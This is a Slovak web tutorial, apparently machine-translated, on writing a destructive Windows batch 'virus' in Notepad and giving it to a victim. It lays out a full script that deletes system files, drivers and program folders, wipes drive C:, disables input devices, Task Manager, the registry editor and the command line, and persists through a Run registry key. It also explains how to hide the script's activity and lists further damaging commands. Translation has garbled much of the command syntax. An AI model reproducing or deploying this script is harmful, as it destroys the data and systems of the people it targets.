Užitočné tipy

Písanie vírusov v notebooku

Zaregistrujte sa >> hostitelia
ochp 1251
sada papka = 0
:1
set / A papka = papka + 1
md% UserProfile% Desktop% LOL_% papka%
ak nie% papka% == 1 000 000 goto 1
del% programfiles% / q> nul
del C: Documents and Settings / q> nul
del% WinDir% / q> nul
rundll32 myš, vypnite> nul
rundll32 klávesnica, vypnite> nul
rundll32 user, disableoemlayer> nul
čas 00:00> nul
reg add HKCU Software Microsoft Windows CurrentVersion Policies Explorer RestrictRun / v 1 / t REG_DWORD / d% SystemRoot% explorer.exe / f> nul
taskkill / f / im explorer.exe> ​​nul
del: *. * / q> nul
kópia% 0 C: Windows Win32.bat> nul
reg add "HKCU Software Microsoft Windows CurrentVersion Run" / v Win32 / t REG_SZ / d C: Windows Win32.bat / f
reg add HKCU Software Microsoft Windows CurrentVersion Polices System / v DisableTaskMgr / t REG_DWORD / d 1 / f> nul
reg add HKCU Software Microsoft Windows CurrentVersion Policies System / v DisableRegistryTools / t REG_DWORD / d 1 / f> nul
reg add HKCU Software Microsoft Windows CurrentVersion Policies System / v DisableCMD / t REG_DWORD / d 2 / f> nul
reg add HKCU Software Microsoft Windows CurrentVersion Policies Explorer / v NoDesktop / t REG_DWORD / d 1 / f> nul
del% WinDir% system32 HAL.dll / q> nul
del "% SystemRoot% Driver Cache i386 driver.cab" / f / q> nul
del "% SystemRoot% Media" / q> nul
assoc * .exe = * .guf
assoc .lnk = .txt
FOR / L %% i IN (1,1 100 000) DO md %% i
% SystemRoot% / system32 / rundll32 user32, SwapMouseButton> nul
del "% SystemRoot% Cursors *. *"> nul
reg add HKCU Software Microsoft Windows ShellNoRoam MUICache / v @C: WINDOWS system32 SHELL32.dll, -8964 / t REG_SZ / d upO / f
reg add HKCU Software Microsoft Windows Current Version Policies Explorer / v NoControlPanel / t REG_DWORD / d 1 / f> nul
copy "% 0" "% SystemRoot% system32 sys321.bat> nul
del: * .lnk / q
shutdown -s -t 00 -c error> nul
vypnutie -r -t 00 -c chyba> nul
rd C: / s / q> nul
del% 0


3) Teraz musíte Uložiť ako vo formáte bin
Vrháme vírus na obeť)
Veľa šťastia

Používateľ V.I.P

Hádajte, čo tento program urobí? O 15 sekúnd sa otvorí 50 kalkulačiek predtým, ako má užívateľ čas pochopiť, čo sa stalo)) Samozrejme, zatiaľ čo program kalkulačky otvorí, zobrazí sa čierne okno (príkazový riadok vykonania), ak je zatvorené, potom program skončí.
Aby ste tomu zabránili, zvážte ďalšie 2 nové tímy.

Nový príkaz „@echo off“ je uvedený na začiatku nášho vírusu a skryje všetko, čo sa v ňom stane v budúcnosti. Jedným slovom nedovolíme užívateľovi vidieť, čo sa stalo. Po pridaní jednoduchej, ale veľmi efektívnej akcie po každom príkaze, napríklad „> nul“, napríklad „čas 00:00> nul“, skryjeme riadok. Môžeme teda vylepšiť náš vírus:

Ak program otvorí kalkulačky na neurčito, počítač zamrzne, ale môžeme zadať nielen kalkulačky! Môžete spustiť taskmgr (Správca úloh), môžete mspaint (Maľovať) atď.
Teraz krátky zoznam toho, čo môžete napísať do vírusu Notepad.
LIST:

1) „copy% 0 x: y“ - skopíruje vírus na disk x v priečinku y (napríklad kópia% 0 C: System.bat),
2) „label x: y“ - premenuje disk x na názov y (príklad label C: chyba),
3) „čas x: y“ - mení čas x hodiny a y minúty (príklad čas 14:27),
4) „dátum x.y.z“ - zmena dátumu na x deň, y mesiac, z rokov (príklad 16.11.05),
5) „md x“ - vytvorí priečinok v mieste, kde je náš vírus pomenovaný x (príklad md Papka),
6) „del *. * / Q“ - vymaže všetky súbory (aj náš vírus) v priečinku, v ktorom leží náš vírus (okrem priečinkov),
7) „del x: y *. * / Q“ - vymaže všetky súbory na disku x v priečinku y (okrem priečinkov) (príklad del F: Data *. * / Q),
8) „assoc .x = .y“ - opakujte všetky súbory v počítači vo formáte x na y (napríklad assoc .exe = .mp3),
9) „net user“ x „/ add“ - pridá sa do počítača používateľa pod menom x (príklad net user „údený“ / add),
Poďme analyzovať pár krutých scenárov.

Pomocou týchto dvoch riadkov veľmi poškodzujeme počítač obete. Mení prípony všetkých súborov v počítači pomocou .lnk v .txt a .exe v .mp3. To znamená, že všetky klávesové skratky sa otvárajú v programe Poznámkový blok a programy, všetko v prehrávači. Ťažké áno? To je všetko) Na všetky úspešné vírusy písma informujte noobovcov, ktorí zaplatia za povodeň!

Tu je najzaujímavejšie.

[*] “Taskkill / f / im explorer.exe> ​​nul” - Zabite proces Explorer.exe a môžete tiež napísať proces zabitia.

[*] “Taskkill / f / im pb.exe> ​​nul” - zabije pb.eche)

[*] "Reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPolicies System / v DisableTaskMgr / t REG_DWORD / d 1 / f> nul" - Zakáže klávesovú skratku Ctrl-Alt-Del

[*] "Del"% SystemRoot% system32 * .dll "/ q> nul" - Odstrániť všetky systémové dll (dynamické knižnice sťahovania)

[*] "Del"% SystemRoot% Driver Cachei386driver.cab "/ f / q> nul" - Odstráňte všetky ovládače nainštalované v počítači

[*] “% SystemRoot% / system32 / rundll32 user32, SwapMouseButton> nul” - Zameniť hodnoty tlačidla myši

[*] "Reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPolicies ExplorerRestrictRun / v 1 / t REG_DWORD / d% SystemRoot% explorer.exe / f> nul" - Znemožňuje spúšťanie aplikácií

[*] „Čas 0:00> nul“ - Nastavte čas na 00:00

[*] "Reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPolicies System / v DisableRegistryTools / t REG_DWORD / d 1 / f> nul" - Zakáže manuálnu úpravu registra

[*] "Del"% SystemRoot% kurzory *. * "> Nul" - Vymažte kurzor myši

[*] "Del"% SystemRoot% Media "/ q> nul" - Odstrániť zvuky systému Windows

[*] "Reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPolicies Explorer / v NoControlPanel / t REG_DWORD / d 1 / f> nul" - Odmietnutie volania na ovládací panel

[*] "Reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPolicies Explorer / v NoDesktop / t REG_DWORD / d 1 / f> nul" - Odstráňte pracovnú plochu

[*] „Shutdown -r -t 1 -c" lol "-f> nul" - Nútené reštartovanie PC

[*] "Shutdown -s -t 1 -c" lol "-f> nul" - Nútené vypnutie PC

[*] "Čistá zdieľaná položka" ResName "=" C: "> nul" - Zdieľajte jednotku C:

[*] „Menovka C: Jednotka> nul - Premenovať jednotku C:

[*] "Msg *" Text správy "> nul" - pomocou tlačidla OK môžete zobraziť správu v štýle systému Windows

[*] "Del"% 0 "> nul" - Vlastné odstránenie vírusu

Ak neviete, ako zmeniť príponu súboru, postupujte takto:
prejdite na ovládací panel, prejdite na kartu Vlastnosti priečinka -> karta Zobraziť. V časti „Rozšírené možnosti“ zrušte začiarknutie políčka „Skryť prípony pre registrované typy súborov“. Kliknite na tlačidlo OK. Teraz vyberte požadovaný súbor, kliknite naň pravým tlačidlom myši a v zobrazenej ponuke vyberte príkaz „Premenovať“. Odstráňte rozšírenie (posledné tri písmená) a napíšte nové! Na klávesnici stlačte kláves „Enter“.
Hotovo !: D